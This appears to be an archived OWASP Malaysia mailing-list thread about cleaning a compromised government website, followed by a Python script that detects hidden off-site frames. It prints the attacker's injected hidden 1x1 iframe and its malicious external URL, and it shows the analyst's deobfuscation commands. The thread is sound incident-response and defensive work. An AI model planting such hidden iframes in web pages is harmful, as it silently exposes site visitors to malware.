Syamsuri, nice to hear that. Can you share your blog address? Adnan, good work. Hope to learn more from you.
On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote:
> Mr Adnan thanks for the info and guide..
>
> I have cleaned all the mess and the site is up and running again..
>
> thanks to all too..
>
> ** I will blog this so others can make it as a guide...
>
> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
>
>> mamp <= LOL typo.. it should be nano
>> js <= one of the binaries in Spidermonkey. get the patched version
>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>> working on MacOS/Darwin, apply this patch
>>
>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>
>> thanks
>>
>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>> <[email protected]> wrote:
>> > I can see 2 interesting apps/scripts:
>> >
>> > 1. mamp
>> > 2. /opt/analysis/js/js
>> >
>> > care to share? hopefully it is open source ;)
>> >
>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>> > <[email protected]> wrote:
>> >>
>> >> Here is my bash history:
>> >>
>> >> xanda:tmp adnan$ history
>> >> <snip>
>> >> 500 cd /tmp
>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php
>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php
>> >> 503 nano indexsedc.php
>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php
>> >> 505 mamp indexsedc.php.1
>> >> 506 nano indexsedc.php.1
>> >> 507 wget http://www2.pkink.gov.my/sedc.php
>> >> 508 nano sedc.php
>> >> 509 wget http://www2.pkink.gov.my/default.php
>> >> 510 nano default.php
>> >> 511 nano default.php
>> >> 512 clear
>> >> <I've remove tags and leave clean JavaScript inside>
>> >> 513 mv default.php default.txt
>> >> 514 /opt/analysis/js/js < default.txt
>> >> 515 cat write.log
>> >> 516 history
>> >> xanda:tmp adnan$
>> >>
>> >> Below is the output of the cat:
>> >> [output]
>> >> xanda:tmp adnan$ cat write.log
>> >> <iframe width="1" height="1"
>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> "></iframe>"<iframe
>> >> width="1" height="1"
>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> "></iframe>"
>> >> [/output]
>> >>
>> >> Hint: you might use modified version of spidermonkey to 'understand'
>> >> the javascript
>> >>
>> >> Thanks
>> >>
>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote:
>> >> > thanks for the info..
>> >> > i will check all the file.
>> >> >
>> >> > how you found it?
>> >> >
>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>> >> > <[email protected]> wrote:
>> >> >>
>> >> >> Here is the flow:
>> >> >>
>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>> >> >> 2) and your sedc.php has an iframe to default.php
>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>> >> >> actually create an iframe to
>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >>
>> >> >> thanks :)
>> >> >>
>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> wrote:
>> >> >> > can you point...
>> >> >> > my index.htm or indexsedc.php or other file?
>> >> >> >
>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>> >> >> > <[email protected]> wrote:
>> >> >> >>
>> >> >> >> you have iframe pointed to
>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >> >>
>> >> >> >> which is not xss :)
>> >> >> >>
>> >> >> >> From my personal point of view, it's either caused by:
>> >> >> >> 1) malware on pc which has been used for ftp/access to the server
>> >> >> >> 2) compromised server
>> >> >> >>
>> >> >> >> you can send your access.log to [email protected] or
>> >> >> >> [email protected] for further analysis :)
>> >> >> >>
>> >> >> >> thanks
>> >> >> >>
>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> wrote:
>> >> >> >> > I have checked it.
>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected]> wrote:
>> >> >> >> >>
>> >> >> >> >> Hi Mohd Syamsuri,
>> >> >> >> >>
>> >> >> >> >> Why don't you check on the reason why it's being blocked, it might
>> >> >> >> >> help.
>> >> >> >> >>
>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >> >> >> >>
>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >> >> >> >>
>> >> >> >> >> Regards,
>> >> >> >> >> Kishur
>> >> >> >> >>
>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>> >> >> >> >> <[email protected]>
>> >> >> >> >> wrote:
>> >> >> >> >>>
>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>> >> >> >> >>> I need some advice.
>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for almost
>> >> >> >> >>> 4 days.
>> >> >> >> >>> It said that we host malware on our server Malware Detected! (
>> >> >> >> >>> Google said that!!)
>> >> >> >> >>> What i did is..
>> >> >> >> >>> 1. Scan all the data and upload a new data
>> >> >> >> >>> 2. Check the index.html or index.php
>> >> >> >> >>> 3. Scan using web scanner using
>> >> >> >> >>> http://www.avgthreatlabs.com/
>> >> >> >> >>> http://www.virustotal.com
>> >> >> >> >>> but still get block..
>> >> >> >> >>> Google said Suspected injected code
>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>> >> >> >> >>> NAME="confcontent"
>> >> >> >> >>> scrolling=yes >
>> >> >> >> >>> I have using this code for almost 2 years
>> >> >> >> >>> What should i do now?
>> >> >> >> >>>
>> >> >> >> >>> --
>> >> >> >> >>> best regard
>> >> >> >> >>> syamsuri
>> >> >> >> >>>
>> >> >> >> >>> _______________________________________________
>> >> >> >> >>> Owasp-Malaysia mailing list
>> >> >> >> >>> [email protected]
>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >> >>>
>> >> >> >> >>> OWASP Malaysia Wiki
>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>> >> >> >> >>>
>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >> >
>> >> >> >> > --
>> >> >> >> > best regard
>> >> >> >> > syamsuri
>> >> >> >
>> >> >> > --
>> >> >> > best regard
>> >> >> > syamsuri
>> >> >
>> >> > --
>> >> > best regard
>> >> > syamsuri
>> >
>> > --
>> > Sharuzzaman Ahmat Raslan
>
> --
> best regard
> syamsuri
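The frame chain traced in the thread (indexsedc.php, then sedc.php, then default.php, ending in a 1x1 off-site iframe) can be checked for mechanically. The Python below is an added example, not part of the original messages: the hosts and page bodies are constructed placeholders, and the default.php entry stands in for the document.write() output that the patched js binary logged to write.log, since static parsing alone does not see script-generated frames.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FrameCollector(HTMLParser):
    """Collect (absolute_src, attrs) for every <iframe>/<frame> start tag."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.frames = base_url, []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag in ("iframe", "frame") and a.get("src"):
            self.frames.append((urljoin(self.base_url, a["src"]), a))

def is_hidden(a):
    """1x1, zero-size or CSS-hidden frames are typical of injected content."""
    style = a.get("style", "").replace(" ", "").lower()
    tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style

def trace_frames(start_url, pages, site):
    """Follow frame chains through pages (url -> HTML); return (chain, src, reasons) findings."""
    findings, seen, queue = [], set(), [(start_url, [start_url])]
    while queue:
        url, chain = queue.pop(0)
        if url in seen or url not in pages:
            continue
        seen.add(url)
        collector = FrameCollector(url)
        collector.feed(pages[url])
        for src, attrs in collector.frames:
            host = urlparse(src).hostname or ""
            on_site = host == site or host.endswith("." + site)
            reasons = ([] if on_site else ["off-site"]) + (["hidden"] if is_hidden(attrs) else [])
            if reasons:
                findings.append((chain, src, reasons))
            if on_site:
                queue.append((src, chain + [src]))  # keep following same-site frames
    return findings

# Constructed sample data mirroring the chain in the thread; hosts are placeholders.
START = "http://www2.site.example/indexsedc.php"
PAGES = {
    START: '<html><body><iframe src="sedc.php"></iframe></body></html>',
    "http://www2.site.example/sedc.php": '<IFRAME SRC="/default.php"></IFRAME>',
    # Stands in for the document.write() output captured in write.log.
    "http://www2.site.example/default.php": '<iframe width="1" height="1" src="http://injected.invalid/abc=="></iframe>',
}
print(*trace_frames(START, PAGES, "site.example"), sep="\n")
```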

